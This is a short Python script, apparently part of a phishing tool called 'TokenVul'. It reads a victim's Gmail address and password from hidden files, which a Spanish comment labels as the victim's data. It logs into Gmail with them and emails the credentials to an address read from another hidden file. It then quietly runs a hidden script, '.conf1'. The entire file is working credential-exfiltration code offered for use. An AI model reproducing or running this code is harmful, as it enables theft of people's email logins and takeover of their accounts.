#!/usr/bin/python
# -*- coding: utf-8 -*-

# TokenVul
# By NePtYx

import smtplib

f = open(".gmail1.txt", "r")
contenttt = f.read()

f = open(".pwd.txt", "r")
contentt = f.read()

f = open(".gmail.txt", "r")
content = f.read()

fromaddr = (content)
toaddrs  = (contenttt)
msg = (content + contentt)


# Datos del correo de la victima
username = (content)
password = (contentt)

# Enviando el correo receptor
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(username,password)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
f.close()
f.close()
f.close()
import os
resultado = os.system("python .conf1")
